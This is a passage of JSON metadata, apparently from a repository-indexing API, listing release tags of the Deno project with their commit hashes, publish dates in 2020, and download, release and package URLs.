cies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p